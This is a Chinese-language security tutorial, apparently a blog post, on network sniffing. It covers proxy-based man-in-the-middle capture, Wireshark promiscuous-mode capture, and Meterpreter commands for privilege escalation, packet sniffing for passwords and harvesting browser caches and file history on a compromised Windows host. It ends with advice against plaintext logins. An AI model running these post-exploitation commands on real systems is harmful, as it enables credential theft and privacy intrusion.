聲明：禁止用作非法目的，謝絕一切形式的轉載。

當你在登陸某個網(wǎng)站的時候，當你在用ftp登陸傳輸文件的時候，你的密碼可能已經(jīng)被嗅探到了。黑客利用網(wǎng)絡嗅探可以獲取大量有用的信息。

預備條件

1. 生成木馬，可參考這里

2. 獲取meterpreter，可參考這里

網(wǎng)絡抓包

抓取數(shù)據(jù)包通常有兩種方式，一種時基于代理服務器的，像Burpsuit、Fiddler等，另一種就是基于網(wǎng)卡，最著名的就是Wireshark。這里主要指的是抓取web的數(shù)據(jù)流。

代理服務器

代理服務器

代理服務器英文全稱是（Proxy Server），其功能就是代理網(wǎng)絡用戶去取得網(wǎng)絡信息。形象的說：它是網(wǎng)絡信息的中轉站。代理服務器就好象一個大的Cache，這樣就能顯著提高瀏覽速度和效率。更重要的是：Proxy Server（代理服務器）是Internet鏈路級網(wǎng)關所提供的一種重要的安全功能

抓包原理

下圖展示了數(shù)據(jù)流的走向，很明顯，這就是大名鼎鼎的"中間人攻擊"，所有的數(shù)據(jù)流都要走代理服務器，因此代理服務器能截獲所有的數(shù)據(jù)流。Burpsuit以及Fiddler等都是基于這種原理。

1. sequenceDiagram

2. 瀏覽器 ->> 代理服務器: ssl client hello

3. 代理服務器-->>瀏覽器: 代理服務器的證書(C1)

4. 代理服務器->>真正服務器: ssl client hello

5. 真正服務器-->>代理服務器 : 真正服務器的證書(C2)

網(wǎng)卡

網(wǎng)卡

網(wǎng)卡(NIC)是局域網(wǎng)（LAN,全稱是：Local Area NetWork）中連接計算機和傳輸介質(zhì)的接口，它工作在物理層(L1）。它是處于主機箱內(nèi)的一塊網(wǎng)絡接口板，因為它的存在，從而使得本機能夠與外部局域網(wǎng)進行連接通信。任何一臺計算機，想要進行上網(wǎng)、通信功能，就必須使用網(wǎng)卡。

Wireshark協(xié)議分析器原理

網(wǎng)絡上傳輸?shù)臄?shù)據(jù)包通過網(wǎng)卡進入到網(wǎng)絡協(xié)議分析器系統(tǒng)。協(xié)議分析器所使用的網(wǎng)卡和網(wǎng)卡 驅動程序必須能夠支持“混雜模式操作（Promiscuous Mode Operation）”。因為只有運行在混雜模式下的網(wǎng)卡才能夠捕獲到網(wǎng)絡中傳輸?shù)狡渌O備的“廣播數(shù)據(jù)包、多播數(shù)據(jù)包、單播數(shù)據(jù)包以及錯誤數(shù)據(jù)包等等”，兩者一起協(xié)同工作。分析器原理圖如下：

meterpreter網(wǎng)絡嗅探

1. 加載嗅探模塊?usesniffer

2. 提升權限到System?getsystem?

1. 列出"肉雞"所有開放的網(wǎng)絡接口?sniffer_interfaces?

1. 獲取正在實施嗅探網(wǎng)絡接口的統(tǒng)計數(shù)據(jù)?sniffer_start3

2. dump數(shù)據(jù)包?sniffer_dump3/tmp/test3.cap

3. 用wireshark分析數(shù)據(jù)包，可以看到用戶名密碼都是burning?

meterpreter獲取敏感數(shù)據(jù)

run post/windows/gather/checkvm #是否虛擬機

run post/windows/gather/enum_applications #獲取安裝軟件信息

run post/windows/gather/dumplinks #獲取最近的文件操作

run post/windows/gather/enum_ie #獲取IE緩存

run post/windows/gather/enum_chrome #獲取Chrome緩存

寫在最后

盡量不要使用表單進行登陸，這個可以考慮使用div等來進行替換。對于密碼傳輸，明文是不應該出出現(xiàn)的，因此像FTP這樣的工具應該謹慎使用。

公眾號

更多網(wǎng)絡安全，歡迎關注我的公眾號:無情劍客。